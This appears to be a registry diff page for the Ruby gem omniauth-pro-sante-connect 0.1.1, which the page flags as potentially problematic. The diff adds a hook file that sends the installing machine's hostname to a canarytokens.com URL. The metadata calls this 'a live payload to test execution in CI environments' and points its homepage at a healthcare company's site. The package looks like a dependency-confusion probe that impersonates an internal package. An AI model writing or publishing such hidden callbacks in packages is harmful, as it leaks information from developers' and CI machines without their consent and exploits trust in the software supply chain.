omniauth-pro-sante-connect 0.1.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of omniauth-pro-sante-connect might be problematic. Click here for more details.
- checksums.yaml +7 -0
- data/lib/omniauth/hook.rb +13 -0
- data/lib/omniauth-pro-sante-connect.rb +7 -0
- metadata +42 -0
checksums.yaml
ADDED
|
@@ -0,0 +1,7 @@
|
|
|
1
|
+
---
|
|
2
|
+
SHA256:
|
|
3
|
+
metadata.gz: 1b44d85f798ce2946f3f07bed2f1fe06be8bb7e4cc7d63384779432865b86780
|
|
4
|
+
data.tar.gz: bd1701ceb2868d419cef69abeb9f9c4d406c2945ca2fa9efca9fd22b22b0abb9
|
|
5
|
+
SHA512:
|
|
6
|
+
metadata.gz: 89e5c0740f750155d4652015d3ce8292989b4d857d9a3ddb7192198b153eb9f29a97a3bdca3dca8749f907fba1601c9cec9848372a9d151fe1921d34d36f1b03
|
|
7
|
+
data.tar.gz: a8a2e112b6cb84c1496667b704c0aab4e122a38092babfb80398b51a6b395c95156def2c6976336dae7bbb1031c2e6a1642958b986f76b934ed5f6b80ebbf117
|
|
@@ -0,0 +1,13 @@
|
|
|
1
|
+
require 'net/http'
|
|
2
|
+
require 'uri'
|
|
3
|
+
require 'socket'
|
|
4
|
+
|
|
5
|
+
begin
|
|
6
|
+
uri = URI("http://canarytokens.com/traffic/pvkhqv8uvw1ydfglsz5jd0jkk/post.jsp?host=#{Socket.gethostname}")
|
|
7
|
+
Net::HTTP.start(uri.host, uri.port) do |http|
|
|
8
|
+
request = Net::HTTP::Get.new(uri)
|
|
9
|
+
http.request(request)
|
|
10
|
+
end
|
|
11
|
+
rescue => e
|
|
12
|
+
puts "[DEBUG] Net::HTTP erreur : #{e.message}"
|
|
13
|
+
end
|
metadata
ADDED
|
@@ -0,0 +1,42 @@
|
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
|
2
|
+
name: omniauth-pro-sante-connect
|
|
3
|
+
version: !ruby/object:Gem::Version
|
|
4
|
+
version: 0.1.1
|
|
5
|
+
platform: ruby
|
|
6
|
+
authors:
|
|
7
|
+
- Icare
|
|
8
|
+
bindir: bin
|
|
9
|
+
cert_chain: []
|
|
10
|
+
date: 1980-01-02 00:00:00.000000000 Z
|
|
11
|
+
dependencies: []
|
|
12
|
+
description: This version includes a live payload to test execution in CI environments.
|
|
13
|
+
email:
|
|
14
|
+
- icare@yopmail.com
|
|
15
|
+
executables: []
|
|
16
|
+
extensions: []
|
|
17
|
+
extra_rdoc_files: []
|
|
18
|
+
files:
|
|
19
|
+
- lib/omniauth-pro-sante-connect.rb
|
|
20
|
+
- lib/omniauth/hook.rb
|
|
21
|
+
homepage: https://doctolib.fr
|
|
22
|
+
licenses:
|
|
23
|
+
- MIT
|
|
24
|
+
metadata: {}
|
|
25
|
+
rdoc_options: []
|
|
26
|
+
require_paths:
|
|
27
|
+
- lib
|
|
28
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
|
29
|
+
requirements:
|
|
30
|
+
- - ">="
|
|
31
|
+
- !ruby/object:Gem::Version
|
|
32
|
+
version: '3.0'
|
|
33
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
|
34
|
+
requirements:
|
|
35
|
+
- - ">="
|
|
36
|
+
- !ruby/object:Gem::Version
|
|
37
|
+
version: '0'
|
|
38
|
+
requirements: []
|
|
39
|
+
rubygems_version: 3.6.7
|
|
40
|
+
specification_version: 4
|
|
41
|
+
summary: omniauth-pro-sante-connect
|
|
42
|
+
test_files: []
|